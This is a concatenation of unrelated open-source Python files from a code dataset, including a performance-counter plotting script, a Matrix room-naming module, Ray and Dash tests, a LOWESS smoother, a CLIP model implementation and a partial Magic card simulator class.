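# correlation matrix built in compute_correlation_sparsity_loss reduces to the outer
# normalization below; shapes and data are arbitrary illustration choices.
if __name__ == "__main__":
    from scipy.stats import pearsonr
    rng = np.random.RandomState(0)
    X_demo = rng.randn(1000, 5)  # stands in for the feature matrix X
    Z_demo = rng.randn(1000, 3)  # stands in for the latent matrix Z
    Xc = X_demo - X_demo.mean(axis=0)
    Zc = Z_demo - Z_demo.mean(axis=0)
    corr = (Xc.T @ Zc / X_demo.shape[0]) / np.outer(X_demo.std(axis=0), Z_demo.std(axis=0))
    assert np.allclose(corr[0, 0], pearsonr(X_demo[:, 0], Z_demo[:, 0])[0])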
|
the-stack_106_15812
|
#!/usr/bin/env python
# plot already normalized data
# first column is time stamp
#plot-normalized.py taken from PMU-tools
import csv
import matplotlib.pyplot as plt
import sys
import argparse
ap = argparse.ArgumentParser(usage='Plot already normalized CSV data')
ap.add_argument('--output', '-o', help='Output to file. Otherwise show.',
nargs='?')
ap.add_argument('inf', nargs='?', default=sys.stdin, type=argparse.FileType('r'),
help='input CSV file')
args = ap.parse_args()
inf = args.inf
rc = csv.reader(inf)
num = 0
timestamps = []
columns = dict()
for r in rc:
num += 1
if num == 1:
for j in r[1:]:
columns[j] = []
continue
timestamps.append(r[0])
c = 1
for j in columns:
try:
columns[j].append(float(r[c]))
except ValueError:
columns[j].append(float('nan'))
c += 1
#edit PMU-tools plot-normalized.py to plot LLC load misses per kilo-instruction (MPKI)
LLC = []
for j, k in zip(columns['instructions'], columns['LLC-load-misses']):
    if j == 0:
        # no instructions retired in this sample: carry the previous value (NaN if first)
        LLC.append(LLC[-1] if LLC else float('nan'))
        continue
    else:
        LLC_val = float(k) / float(j) * 1000.0  # misses per kilo-instruction
        LLC.append(LLC_val)
plt.plot(timestamps,LLC,'b-',label='LLC')
plt.title('Time vs. LLC_load_misses')
plt.xlabel('Seconds')
plt.ylabel('LLC MPK')
leg = plt.legend()
leg.get_frame().set_alpha(0.5)
if args.output:
plt.savefig(args.output)
#plt.show()
else:
plt.show()
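# Hedged usage note (file and column names are illustrative): the input CSV is
# expected to start with a header row naming the counters, with the timestamp in
# the first column, e.g.
#   Timestamp,instructions,LLC-load-misses
#   0.100,1200000,3400
#   0.200,1180000,3100
# and the script would then be invoked as, for instance,
#   python plot-llc.py -o llc.png counters.csv
# It requires at least the 'instructions' and 'LLC-load-misses' columns.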
|
the-stack_106_15815
|
# -*- coding: utf-8 -*-
# Copyright 2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import re
from typing import TYPE_CHECKING, Dict, Iterable, Optional
from synapse.api.constants import EventTypes, Membership
from synapse.events import EventBase
from synapse.types import StateMap
if TYPE_CHECKING:
from synapse.storage.databases.main import DataStore
logger = logging.getLogger(__name__)
# intentionally looser than what aliases we allow to be registered since
# other HSes may allow aliases that we would not
ALIAS_RE = re.compile(r"^#.*:.+$")
ALL_ALONE = "Empty Room"
async def calculate_room_name(
store: "DataStore",
room_state_ids: StateMap[str],
user_id: str,
fallback_to_members: bool = True,
fallback_to_single_member: bool = True,
) -> Optional[str]:
"""
Works out a user-facing name for the given room as per Matrix
spec recommendations.
Does not yet support internationalisation.
Args:
store: The data store to query.
room_state_ids: Dictionary of the room's state IDs.
user_id: The ID of the user to whom the room name is being presented
fallback_to_members: If False, return None instead of generating a name
based on the room's members if the room has no
title or aliases.
fallback_to_single_member: If False, return None instead of generating a
name based on the user who invited this user to the room if the room
has no title or aliases.
Returns:
A human readable name for the room, if possible.
"""
# does it have a name?
if (EventTypes.Name, "") in room_state_ids:
m_room_name = await store.get_event(
room_state_ids[(EventTypes.Name, "")], allow_none=True
)
if m_room_name and m_room_name.content and m_room_name.content.get("name"):
return m_room_name.content["name"]
# does it have a canonical alias?
if (EventTypes.CanonicalAlias, "") in room_state_ids:
canon_alias = await store.get_event(
room_state_ids[(EventTypes.CanonicalAlias, "")], allow_none=True
)
if (
canon_alias
and canon_alias.content
and canon_alias.content.get("alias")
and _looks_like_an_alias(canon_alias.content["alias"])
):
return canon_alias.content["alias"]
if not fallback_to_members:
return None
my_member_event = None
if (EventTypes.Member, user_id) in room_state_ids:
my_member_event = await store.get_event(
room_state_ids[(EventTypes.Member, user_id)], allow_none=True
)
if (
my_member_event is not None
and my_member_event.content.get("membership") == Membership.INVITE
):
if (EventTypes.Member, my_member_event.sender) in room_state_ids:
inviter_member_event = await store.get_event(
room_state_ids[(EventTypes.Member, my_member_event.sender)],
allow_none=True,
)
if inviter_member_event:
if fallback_to_single_member:
return "Invite from %s" % (
name_from_member_event(inviter_member_event),
)
else:
return None
else:
return "Room Invite"
# at this point we're going to need to search the state by all state keys
# for an event type, so rearrange the data structure
room_state_bytype_ids = _state_as_two_level_dict(room_state_ids)
# we're going to have to generate a name based on who's in the room,
# so find out who is in the room that isn't the user.
if EventTypes.Member in room_state_bytype_ids:
member_events = await store.get_events(
list(room_state_bytype_ids[EventTypes.Member].values())
)
all_members = [
ev
for ev in member_events.values()
if ev.content.get("membership") == Membership.JOIN
or ev.content.get("membership") == Membership.INVITE
]
# Sort the member events oldest-first so that we name people in the
# order they joined (it should at least be deterministic rather than
# dictionary iteration order)
all_members.sort(key=lambda e: e.origin_server_ts)
other_members = [m for m in all_members if m.state_key != user_id]
else:
other_members = []
all_members = []
if len(other_members) == 0:
if len(all_members) == 1:
# self-chat, peeked room with 1 participant,
# or inbound invite, or outbound 3PID invite.
if all_members[0].sender == user_id:
if EventTypes.ThirdPartyInvite in room_state_bytype_ids:
third_party_invites = room_state_bytype_ids[
EventTypes.ThirdPartyInvite
].values()
if len(third_party_invites) > 0:
# technically third party invite events are not member
# events, but they are close enough
# FIXME: no they're not - they look nothing like a member;
# they have a great big encrypted thing as their name to
# prevent leaking the 3PID name...
# return "Inviting %s" % (
# descriptor_from_member_events(third_party_invites)
# )
return "Inviting email address"
else:
return ALL_ALONE
else:
return name_from_member_event(all_members[0])
else:
return ALL_ALONE
elif len(other_members) == 1 and not fallback_to_single_member:
return None
return descriptor_from_member_events(other_members)
def descriptor_from_member_events(member_events: Iterable[EventBase]) -> str:
"""Get a description of the room based on the member events.
Args:
member_events: The events of a room.
Returns:
The room description
"""
member_events = list(member_events)
if len(member_events) == 0:
return "nobody"
elif len(member_events) == 1:
return name_from_member_event(member_events[0])
elif len(member_events) == 2:
return "%s and %s" % (
name_from_member_event(member_events[0]),
name_from_member_event(member_events[1]),
)
else:
return "%s and %d others" % (
name_from_member_event(member_events[0]),
len(member_events) - 1,
)
def name_from_member_event(member_event: EventBase) -> str:
if member_event.content and member_event.content.get("displayname"):
return member_event.content["displayname"]
return member_event.state_key
def _state_as_two_level_dict(state: StateMap[str]) -> Dict[str, Dict[str, str]]:
ret = {} # type: Dict[str, Dict[str, str]]
for k, v in state.items():
ret.setdefault(k[0], {})[k[1]] = v
return ret
def _looks_like_an_alias(string: str) -> bool:
return ALIAS_RE.match(string) is not None
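# Hedged sketch (not part of the original module): the two pure helpers above can be
# exercised without a homeserver, as long as the synapse imports at the top resolve.
# State maps are keyed by (event type, state key) tuples.
if __name__ == "__main__":
    demo_state = {
        ("m.room.member", "@alice:example.org"): "$event_a",
        ("m.room.name", ""): "$event_b",
    }
    assert _state_as_two_level_dict(demo_state) == {
        "m.room.member": {"@alice:example.org": "$event_a"},
        "m.room.name": {"": "$event_b"},
    }
    assert _looks_like_an_alias("#room:example.org")
    assert not _looks_like_an_alias("not-an-alias")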
|
the-stack_106_15816
|
"""
Testing of callbacks in non-Python Alert snippets.
"""
from pathlib import Path
import dash.testing.wait as wait
from .helpers import load_jl_app, load_r_app
HERE = Path(__file__).parent
def test_r_dismiss(dashr):
r_app = load_r_app((HERE.parent / "alert" / "dismiss.R"), "alert")
dashr.start_server(r_app)
check_dismiss_callbacks(dashr)
def test_jl_dismiss(dashjl):
jl_app = load_jl_app((HERE.parent / "alert" / "dismiss.jl"), "alert")
dashjl.start_server(jl_app)
check_dismiss_callbacks(dashjl)
def check_dismiss_callbacks(runner):
assert runner.find_element("#alert-fade") != []
runner.find_element("#alert-toggle-fade").click()
wait.until(
lambda: runner.find_elements("#alert-fade") == [],
timeout=4,
)
assert runner.find_element("#alert-no-fade") != []
runner.find_element("#alert-toggle-no-fade").click()
wait.until(
lambda: runner.find_elements("#alert-no-fade") == [],
timeout=4,
)
|
the-stack_106_15818
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import logging
import pytest
import ray
import ray.services as services
from ray.test.cluster_utils import Cluster
logger = logging.getLogger(__name__)
@pytest.fixture
def start_connected_cluster():
# Start the Ray processes.
g = Cluster(
initialize_head=True,
connect=True,
head_node_args={
"resources": dict(CPU=1),
"_internal_config": json.dumps({
"num_heartbeats_timeout": 10
})
})
yield g
# The code after the yield will run as teardown code.
ray.shutdown()
g.shutdown()
@pytest.fixture
def start_connected_longer_cluster():
"""Creates a cluster with a longer timeout."""
g = Cluster(
initialize_head=True,
connect=True,
head_node_args={
"resources": dict(CPU=1),
"_internal_config": json.dumps({
"num_heartbeats_timeout": 20
})
})
yield g
# The code after the yield will run as teardown code.
ray.shutdown()
g.shutdown()
def test_cluster():
"""Basic test for adding and removing nodes in cluster."""
g = Cluster(initialize_head=False)
node = g.add_node()
node2 = g.add_node()
assert node.all_processes_alive()
assert node2.all_processes_alive()
g.remove_node(node2)
g.remove_node(node)
assert not any(n.any_processes_alive() for n in [node, node2])
def test_shutdown():
g = Cluster(initialize_head=False)
node = g.add_node()
node2 = g.add_node()
g.shutdown()
assert not any(n.any_processes_alive() for n in [node, node2])
def test_internal_config(start_connected_longer_cluster):
"""Checks that the internal configuration setting works.
We set the cluster to timeout nodes after 2 seconds of no heartbeats. We
then remove a node, wait for 1 second to check that the cluster is out
of sync, then wait another 2 seconds (giving 1 second of leeway) to check
that the client has timed out.
"""
cluster = start_connected_longer_cluster
worker = cluster.add_node()
cluster.wait_for_nodes()
cluster.remove_node(worker)
cluster.wait_for_nodes(retries=10)
assert ray.global_state.cluster_resources()["CPU"] == 2
cluster.wait_for_nodes(retries=20)
assert ray.global_state.cluster_resources()["CPU"] == 1
def test_wait_for_nodes(start_connected_cluster):
"""Unit test for `Cluster.wait_for_nodes`.
Adds 4 workers, waits, then removes 4 workers, waits,
then adds 1 worker, waits, and removes 1 worker, waits.
"""
cluster = start_connected_cluster
workers = [cluster.add_node() for i in range(4)]
cluster.wait_for_nodes()
[cluster.remove_node(w) for w in workers]
cluster.wait_for_nodes()
assert ray.global_state.cluster_resources()["CPU"] == 1
worker2 = cluster.add_node()
cluster.wait_for_nodes()
cluster.remove_node(worker2)
cluster.wait_for_nodes()
assert ray.global_state.cluster_resources()["CPU"] == 1
def test_worker_plasma_store_failure(start_connected_cluster):
cluster = start_connected_cluster
worker = cluster.add_node()
cluster.wait_for_nodes()
# Log monitor doesn't die for some reason
worker.kill_log_monitor()
worker.kill_plasma_store()
worker.process_dict[services.PROCESS_TYPE_RAYLET][0].wait()
assert not worker.any_processes_alive(), worker.live_processes()
|
the-stack_106_15819
|
import numpy as np
class LOWESS:
def __init__(self, sigma=1., frac=1., eps=1e-8):
self.sigma = sigma
self.frac = frac
self.eps = eps
self.X_ = None
self.y_ = None
def _compute_weights(self, x):
distances = np.linalg.norm(self.X_ - x[:, None], axis=-1)
# Gaussian kernel where sigma defines the bandwidth
weights = np.exp(-(distances ** 2) / self.sigma)
# take weights of the closest points only
weights = weights * (distances <= np.quantile(distances, q=self.frac))
# clip weights close to zero
weights = np.where(np.abs(weights) >= self.eps, weights, 0.)
return weights
def fit(self, X, y):
self.X_ = X
self.y_ = y
def predict(self, X):
n_samples = X.shape[0]
y_hat = np.zeros(n_samples)
for i in range(n_samples):
y_hat[i] = np.average(
self.y_,
weights=self._compute_weights(X[i, :]),
)
return y_hat
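# Hedged usage sketch (not part of the original module): smooth a noisy sine wave.
# The sigma/frac values are arbitrary illustration choices, not recommended defaults.
if __name__ == "__main__":
    rng = np.random.RandomState(0)
    X_demo = np.linspace(0.0, 2.0 * np.pi, 200)[:, None]
    y_demo = np.sin(X_demo[:, 0]) + 0.1 * rng.randn(200)
    smoother = LOWESS(sigma=0.5, frac=0.3)
    smoother.fit(X_demo, y_demo)
    y_smooth = smoother.predict(X_demo)
    print("max |smoothed - true|:", np.abs(y_smooth - np.sin(X_demo[:, 0])).max())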
|
the-stack_106_15820
|
# coding: utf-8
"""
CLOUD API
An enterprise-grade Infrastructure is provided as a Service (IaaS) solution that can be managed through a browser-based \"Data Center Designer\" (DCD) tool or via an easy to use API. The API allows you to perform a variety of management tasks such as spinning up additional servers, adding volumes, adjusting networking, and so forth. It is designed to allow users to leverage the same power and flexibility found within the DCD visual tool. Both tools are consistent with their concepts and lend well to making the experience smooth and intuitive. # noqa: E501
The version of the OpenAPI document: 5.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from ionoscloud.configuration import Configuration
class S3ObjectStorageSSO(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'sso_url': 'str',
}
attribute_map = {
'sso_url': 'ssoUrl',
}
def __init__(self, sso_url=None, local_vars_configuration=None): # noqa: E501
"""S3ObjectStorageSSO - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._sso_url = None
self.discriminator = None
if sso_url is not None:
self.sso_url = sso_url
@property
def sso_url(self):
"""Gets the sso_url of this S3ObjectStorageSSO. # noqa: E501
The S3 object storage single sign on url # noqa: E501
:return: The sso_url of this S3ObjectStorageSSO. # noqa: E501
:rtype: str
"""
return self._sso_url
@sso_url.setter
def sso_url(self, sso_url):
"""Sets the sso_url of this S3ObjectStorageSSO.
The S3 object storage single sign on url # noqa: E501
:param sso_url: The sso_url of this S3ObjectStorageSSO. # noqa: E501
:type sso_url: str
"""
self._sso_url = sso_url
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, S3ObjectStorageSSO):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, S3ObjectStorageSSO):
return True
return self.to_dict() != other.to_dict()
|
the-stack_106_15821
|
import math
import copy
from contextlib import contextmanager
from functools import partial
import torch
import torch.nn.functional as F
from torch import nn, einsum
from einops import rearrange, repeat, reduce
from einops.layers.torch import Rearrange
from x_clip.mlm import MLM
from x_clip.visual_ssl import SimSiam, SimCLR
# helper functions
def exists(val):
return val is not None
def default(val, d):
return val if exists(val) else d
@contextmanager
def null_context():
yield
def max_neg_value(dtype):
return -torch.finfo(dtype).max
def masked_mean(t, mask, dim = 1, eps = 1e-6):
t = t.masked_fill(~mask, 0.)
numer = t.sum(dim = dim)
denom = mask.sum(dim = dim).clamp(min = eps)
return numer / denom
def log(t, eps = 1e-20):
return torch.log(t + eps)
def l2norm(t):
return F.normalize(t, dim = -1, p = 2)
# helper classes
class RearrangeImage(nn.Module):
def forward(self, x):
return rearrange(x, 'b (h w) c -> b c h w', h = int(math.sqrt(x.shape[1])))
class PreNorm(nn.Module):
def __init__(self, dim, fn):
super().__init__()
self.norm = nn.LayerNorm(dim)
self.fn = fn
def forward(self, x, **kwargs):
return self.fn(self.norm(x), **kwargs)
# transformer
class FeedForward(nn.Module):
def __init__(self, dim, mult = 4, dropout = 0.):
super().__init__()
inner_dim = int(dim * mult)
self.net = nn.Sequential(
nn.Linear(dim, inner_dim),
nn.GELU(),
nn.Dropout(dropout),
nn.Linear(inner_dim, dim)
)
def forward(self, x):
return self.net(x)
class Attention(nn.Module):
def __init__(self, dim, dim_head = 64, heads = 8, dropout = 0.):
super().__init__()
self.heads = heads
self.scale = dim_head ** -0.5
inner_dim = dim_head * heads
self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False)
self.to_out = nn.Linear(inner_dim, dim)
self.dropout = nn.Dropout(dropout)
def forward(self, x, mask = None):
h = self.heads
q, k, v = self.to_qkv(x).chunk(3, dim = -1)
q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), (q, k, v))
sim = einsum('b h i d, b h j d -> b h i j', q, k) * self.scale
if exists(mask):
mask = rearrange(mask, 'b j -> b 1 1 j')
mask_value = -torch.finfo(sim.dtype).max
sim = sim.masked_fill(~mask, mask_value)
attn = sim.softmax(dim = -1)
attn = self.dropout(attn)
out = einsum('b h i j, b h j d -> b h i d', attn, v)
out = rearrange(out, 'b h n d -> b n (h d)')
return self.to_out(out)
class Transformer(nn.Module):
def __init__(
self,
dim,
*,
depth,
dim_head = 64,
heads = 8,
attn_dropout = 0.,
ff_dropout = 0.,
ff_mult = 4
):
super().__init__()
self.layers = nn.ModuleList([])
for _ in range(depth):
self.layers.append(nn.ModuleList([
PreNorm(dim, Attention(dim = dim, dim_head = dim_head, heads = heads, dropout = attn_dropout)),
PreNorm(dim, FeedForward(dim = dim, mult = ff_mult)),
]))
self.norm_out = nn.LayerNorm(dim)
def forward(self, x, mask = None):
for attn, ff in self.layers:
x = attn(x, mask = mask) + x
x = ff(x) + x
return self.norm_out(x)
# text and vision transformers
class TextTransformer(nn.Module):
def __init__(
self,
dim,
*,
num_tokens,
max_seq_len,
**kwargs
):
super().__init__()
self.token_emb = nn.Embedding(num_tokens, dim)
self.pos_emb = nn.Embedding(max_seq_len, dim)
self.cls_token = nn.Parameter(torch.randn(dim))
self.transformer = Transformer(dim, **kwargs)
def forward(self, x, mask = None):
b, n, device = *x.shape, x.device
x = self.token_emb(x)
pos_emb = self.pos_emb(torch.arange(n, device = device))
x = x + rearrange(pos_emb, 'n d -> 1 n d')
cls_tokens = repeat(self.cls_token, 'd -> b 1 d', b = b)
x = torch.cat((cls_tokens, x), dim = 1)
if exists(mask):
mask = F.pad(mask, (1, 0), value = True)
out = self.transformer(x, mask = mask)
return out
class VisionTransformer(nn.Module):
def __init__(
self,
dim,
*,
image_size,
patch_size,
channels,
**kwargs
):
super().__init__()
assert image_size % patch_size == 0, 'Image dimensions must be divisible by the patch size.'
num_patches = (image_size // patch_size) ** 2
patch_dim = channels * patch_size ** 2
self.cls_token = nn.Parameter(torch.randn(dim))
self.to_tokens = nn.Sequential(
Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_size, p2 = patch_size),
nn.Linear(patch_dim, dim)
)
self.pos_emb = nn.Embedding(num_patches, dim)
self.transformer = Transformer(dim, **kwargs)
def forward(self, x):
device = x.device
x = self.to_tokens(x)
b, n, _ = x.shape
pos_emb = self.pos_emb(torch.arange(n, device = device))
x = x + rearrange(pos_emb, 'n d -> 1 n d')
cls_tokens = repeat(self.cls_token, 'd -> b 1 d', b = b)
x = torch.cat((cls_tokens, x), dim = 1)
out = self.transformer(x)
return out
# main clip class
class CLIP(nn.Module):
def __init__(
self,
*,
image_encoder = None,
text_encoder = None,
dim_text = 512,
dim_image = 512,
dim_latent = 512,
num_text_tokens = 10000,
text_enc_depth = 6,
text_seq_len = 256,
text_heads = 8,
text_has_cls_token = True,
visual_enc_depth = 6,
visual_heads = 8,
visual_image_size = 256,
visual_patch_size = 32,
visual_has_cls_token = True,
channels = 3,
use_all_token_embeds = False,
downsample_image_embeds = False,
decoupled_contrastive_learning = False,
extra_latent_projection = False,
use_mlm = False,
text_ssl_loss_weight = 0.05,
use_visual_ssl = False,
visual_ssl_type = 'simsiam',
visual_ssl_hidden_layer = -1,
simclr_temperature = 0.1,
image_ssl_loss_weight = 0.05
):
super().__init__()
assert use_all_token_embeds or (visual_has_cls_token or text_has_cls_token), 'CLS token must be included on both vision and text transformers if you are not using fine-grained contrastive learning loss'
# instantiate text transformer
self.text_has_cls_token = text_has_cls_token
if exists(text_encoder):
self.text_transformer = text_encoder
else:
self.text_transformer = TextTransformer(
dim = dim_text,
num_tokens = num_text_tokens + (1 if use_mlm else 0),
max_seq_len = text_seq_len,
depth = text_enc_depth,
heads = text_heads
)
# instantiate image transformer
self.visual_has_cls_token = visual_has_cls_token
if exists(image_encoder):
self.visual_transformer = image_encoder
else:
self.visual_transformer = VisionTransformer(
dim = dim_image,
image_size = visual_image_size,
patch_size = visual_patch_size,
channels = channels,
depth = visual_enc_depth,
heads = visual_heads
)
# text ssl
self.use_mlm = use_mlm
self.text_ssl_loss_weight = text_ssl_loss_weight
if use_mlm:
self.mlm = MLM(
self.text_transformer,
dim = dim_text,
num_tokens = num_text_tokens
)
# image ssl
self.use_visual_ssl = use_visual_ssl
self.image_ssl_loss_weight = image_ssl_loss_weight
if use_visual_ssl:
if visual_ssl_type == 'simsiam':
ssl_type = SimSiam
elif visual_ssl_type == 'simclr':
ssl_type = partial(SimCLR, temperature = simclr_temperature)
else:
raise ValueError(f'unknown visual_ssl_type {visual_ssl_type}')
self.visual_ssl = ssl_type(
self.visual_transformer,
image_size = visual_image_size,
hidden_layer = visual_ssl_hidden_layer
)
# text latent projection
self.to_text_latent = nn.Linear(dim_text, dim_latent, bias = False)
# image latent projection
if downsample_image_embeds:
assert use_all_token_embeds, 'must be using all token embeds for contrastive learning in order to downsample the image embeddings'
self.to_visual_latent = nn.Sequential(
RearrangeImage(),
nn.Conv2d(dim_image, dim_image, 4, stride = 2, padding = 1, bias = False, groups = dim_image),
nn.Conv2d(dim_image, dim_latent, 1),
Rearrange('b c h w -> b (h w) c')
)
else:
self.to_visual_latent = nn.Linear(dim_image, dim_latent, bias = False)
# temperature
self.temperature = nn.Parameter(torch.tensor(1.))
# from https://arxiv.org/abs/2111.07783 (FILIP paper)
self.use_all_token_embeds = use_all_token_embeds
# proposed in https://arxiv.org/abs/2110.06848 (DCL) and https://arxiv.org/abs/2110.11316 (CLOOB)
self.decoupled_contrastive_learning = decoupled_contrastive_learning
# proposed in https://arxiv.org/abs/2110.11316 (CLOOB)
self.extra_latent_projection = extra_latent_projection
self.to_text_latent_extra = copy.deepcopy(self.to_text_latent)
self.to_visual_latent_extra = copy.deepcopy(self.to_visual_latent)
def forward(
self,
text,
image,
text_mask = None,
return_loss = False,
freeze_image_encoder = False, # image encoder is not trained if this is set to True, proposed by LiT paper
freeze_text_encoder = False, # text encoder is not trained if this is set to True
text_to_image = True # in the case the extra projection is turned on, would return different similarity values depending on modality directionality
):
b, device = text.shape[0], text.device
# ssl
text_ssl_loss = 0
image_ssl_loss = 0
if return_loss:
text_ssl_loss = self.mlm(text, mask = text_mask) if self.use_mlm else 0
image_ssl_loss = self.visual_ssl(image) if self.use_visual_ssl else 0
# get encoded text
text_encoding_context = null_context if not freeze_text_encoder else torch.no_grad
with text_encoding_context():
enc_text = self.text_transformer(text, mask = text_mask)
if freeze_text_encoder:
enc_text.detach_()
# whether to train image encoder, in the case that the image net was pretrained as recommended in LiT
image_encoding_context = null_context if not freeze_image_encoder else torch.no_grad
with image_encoding_context():
enc_image = self.visual_transformer(image)
if freeze_image_encoder:
enc_image.detach_()
# depending on whether to do fine-grained CLIP or not, select either all tokens, or CLS tokens only
if self.use_all_token_embeds:
text_embeds = enc_text[:, 1:] if self.text_has_cls_token else enc_text
image_embeds = enc_image[:, 1:] if self.visual_has_cls_token else enc_image
else:
text_embeds = enc_text[:, 0]
image_embeds = enc_image[:, 0]
# project to latents
text_latents = self.to_text_latent(text_embeds)
image_latents = self.to_visual_latent(image_embeds)
text_latents, image_latents = map(l2norm, (text_latents, image_latents))
# calculate another set of latents for image to text (vs text to image)
# proposed by CLOOB
text_latents_extra, image_latents_extra = text_latents, image_latents
if self.extra_latent_projection:
text_latents_extra = self.to_text_latent_extra(text_embeds)
image_latents_extra = self.to_visual_latent_extra(image_embeds)
text_latents_extra, image_latents_extra = map(l2norm, (text_latents_extra, image_latents_extra))
# get temperature
temp = self.temperature.exp()
# early return, if needed
if not return_loss and self.use_all_token_embeds:
einsum_args = (text_latents_extra, image_latents_extra) if self.extra_latent_projection and not text_to_image else (text_latents, image_latents)
return einsum('b t d, b i d -> b t i', *einsum_args) * temp
if not return_loss and not self.use_all_token_embeds:
einsum_args = (text_latents_extra, image_latents_extra) if self.extra_latent_projection and not text_to_image else (text_latents, image_latents)
return einsum('b d, b d -> b', *einsum_args) * temp
# contrastive loss
if self.use_all_token_embeds:
# fine-grained CLIP logic
sim_text_to_image = einsum('x t d, y i d -> x y t i', text_latents, image_latents) * temp
sim_image_to_text = sim_text_to_image
if self.extra_latent_projection:
sim_image_to_text = einsum('x t d, y i d -> x y t i', text_latents_extra, image_latents_extra) * temp
if exists(text_mask):
text_to_image = reduce(sim_text_to_image, 'bt bi t i -> bt bi t', 'max')
text_to_image_mask = rearrange(text_mask, 'bt t -> bt 1 t')
text_to_image = masked_mean(text_to_image, text_to_image_mask, dim = -1)
image_to_text_mask = rearrange(text_mask, 'bt t -> bt 1 t 1')
masked_sim = sim_image_to_text.masked_fill(~image_to_text_mask, max_neg_value(sim_image_to_text.dtype))
image_to_text = reduce(reduce(masked_sim, 'bt bi t i -> bt bi i', 'max'), 'bt bi i -> bi bt', 'mean')
else:
text_to_image = reduce(reduce(sim_text_to_image, 'bt bi t i -> bt bi t', 'max'), 'bt bi t -> bt bi', 'mean')
image_to_text = reduce(reduce(sim_image_to_text, 'bt bi t i -> bt bi i', 'max'), 'bt bi i -> bi bt', 'mean')
else:
text_to_image = einsum('t d, i d -> t i', text_latents, image_latents) * temp
image_to_text = text_to_image.t()
if self.extra_latent_projection:
image_to_text = einsum('t d, i d -> i t', text_latents_extra, image_latents_extra) * temp
# calculate loss
# exponentiate
text_to_image_exp, image_to_text_exp = map(torch.exp, (text_to_image, image_to_text))
# numerators
text_to_image_pos, image_to_text_pos = map(torch.diag, (text_to_image_exp, image_to_text_exp))
# denominator
if self.decoupled_contrastive_learning:
pos_mask = torch.eye(b, device = device, dtype = torch.bool)
text_to_image_exp, image_to_text_exp = map(lambda t: t.masked_fill(pos_mask, 0.), (text_to_image_exp, image_to_text_exp))
text_to_image_denom, image_to_text_denom = map(lambda t: t.sum(dim = -1), (text_to_image_exp, image_to_text_exp))
# loss
text_to_image_loss = -log(text_to_image_pos / text_to_image_denom).mean()
image_to_text_loss = -log(image_to_text_pos / image_to_text_denom).mean()
cl_loss = (text_to_image_loss + image_to_text_loss) / 2
# calculate weights
cl_loss_weight = 1 - (self.text_ssl_loss_weight + self.image_ssl_loss_weight)
loss = (cl_loss * cl_loss_weight) \
+ (text_ssl_loss * self.text_ssl_loss_weight) \
+ (image_ssl_loss * self.image_ssl_loss_weight)
return loss
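# Hedged usage sketch (mirrors the constructor/forward signatures above; the small
# hyperparameter values are arbitrary, chosen only so the example runs quickly).
if __name__ == "__main__":
    clip = CLIP(
        dim_text=64,
        dim_image=64,
        dim_latent=64,
        num_text_tokens=1000,
        text_enc_depth=1,
        text_seq_len=32,
        text_heads=4,
        visual_enc_depth=1,
        visual_heads=4,
        visual_image_size=32,
        visual_patch_size=8,
    )
    text = torch.randint(0, 1000, (2, 32))
    images = torch.randn(2, 3, 32, 32)
    mask = torch.ones(2, 32).bool()
    loss = clip(text, images, text_mask=mask, return_loss=True)
    loss.backward()
    print("contrastive loss:", loss.item())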
|
the-stack_106_15823
|
"""
Defines the Card class which models a Magic: the Gathering card's behaviour.
Currently, the following actions are supported: to gain mana instantaneously as
well as according to a pattern every turn, and to create gold/draw cards
immediately as well as according to a pattern every turn. Additionally, a card
has a mana cost and can be a land or nonland. Finally, it may cause the removal of
a number of lands from the remaining deck.
"""
from typing import Optional, TYPE_CHECKING
from mtg_mana_simulator.sequence import Sequence
if TYPE_CHECKING:
from mtg_mana_simulator.context import Context
class Card:
"""Simplified model of a Magic card"""
untapped_land : "Card"
tapped_land : "Card"
cantrip : "Card"
filler : "Card"
def __init__(self, name: str = "", *,
land: bool = False,
cost: Optional[int] = 0,
mana_sequence: Optional[Sequence] = None,
draw_sequence: Optional[Sequence] = None,
gold_sequence: Optional[Sequence] = None,
land_sequence: Optional[Sequence] = None,
lands_removed: int = 0) -> None:
self.name = name
self.land = land
self.cost = cost
self.mana_sequence: Sequence = mana_sequence if mana_sequence is not None else Sequence.zero
self.draw_sequence: Sequence = draw_sequence if draw_sequence is not None else Sequence.zero
self.gold_sequence: Sequence = gold_sequence if gold_sequence is not None else Sequence.zero
self.land_sequence: Sequence = land_sequence if land_sequence is not None else Sequence.zero
self.lands_removed = lands_removed
def approximate_net_mana_sequence(self) -> Sequence:
""" (assuming gold is spent immediately)"""
return self.mana_sequence + self.gold_sequence + Sequence.once(-(self.cost or 0))
def netgain(self) -> int:
"""The immediate return in mana upon playing this card"""
return self.mana_sequence[0] + self.gold_sequence[0] - (self.cost or 0)
def is_ramp(self) -> bool:
"""Whether this card produces mana at some point"""
